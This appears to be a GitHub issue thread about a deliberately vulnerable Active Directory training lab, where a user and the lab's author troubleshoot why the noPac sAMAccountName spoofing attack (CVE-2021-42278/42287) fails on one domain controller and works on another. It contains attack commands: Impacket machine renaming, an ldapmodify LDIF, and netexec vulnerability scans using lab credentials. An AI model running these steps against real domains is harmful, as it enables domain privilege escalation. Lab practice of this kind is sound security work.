Patch SamAccountName [CVE-2021-42287]

[AlgunaPseudo]

Hi,

It would appear that the SamAccountName vulnerability is no longer exploitable on DC02. I've tried to exploit it with Impacket pull requests (fortra/impacket#1202 and fortra/impacket#1224) and also with ldapmodify and in both cases I get an error 00000523 (https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e -> make sure sAMAccountName ends with '$').

Via Impacket :

$ python3 renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
[...]

[*] Modifying attribute (sAMAccountName) of object (CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (samaccountname$) -> (winterfell)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[-] Server probably patched against CVE-2021-42278

Via Ldapsearch :

$ cat modify_samaccountname.ldif
dn: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
changetype: modify
replace: sAMAccountName
sAMAccountName: winterfell

$ ldapmodify -x -H ldap://192.168.10.11 -D "[email protected]" -w iknownothing -f modify_samaccountname.ldif
modifying entry "CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
ldap_modify: Other (e.g., implementation specific) error (80)
	additional info: 00000523: SysErr: DSID-031A1242, problem 22 (Invalid argument), data 0

Why DC02? Because this is the example used in mayfly277's write-up.

[Mayfly277]

i just redo the attack path by copy/pasting the commands from my blog and it work well on a fresh install.

Could you try a TGT pac size test with netexec on your instance ?

i close as it seems to be an issue on your side.

[AlgunaPseudo]

Hi Mayfly,

The command output shows me that the PAC cannot be affected by CVE 2021-42278 :

$ netexec smb winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M nopac
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.11   445    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing 
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743

I hadn't specified it, but my lab was setup on Proxmox (following your doc). Perhaps there's a difference with the lab set up locally via viagrant?

[Mayfly277]

Sad :/ , certainly the image you take (or the link i provide) for setting up the lab is more recent and patched. imo you can try on essos if it work.

[AlgunaPseudo]

Indeed, it works on essos!

$ netexec smb meereen.essos.local -u khal.drogo -p horse -d essos.local -M nopac
SMB         192.168.10.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.12   445    MEEREEN          [+] essos.local\khal.drogo:horse 
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
NOPAC       192.168.10.12   445    MEEREEN          
NOPAC       192.168.10.12   445    MEEREEN          VULNERABLE
NOPAC       192.168.10.12   445    MEEREEN          Next step: https://github.com/Ridter/noPac

(thank you Microsoft for not patching Windows Server 2016)

Thanks for your feedback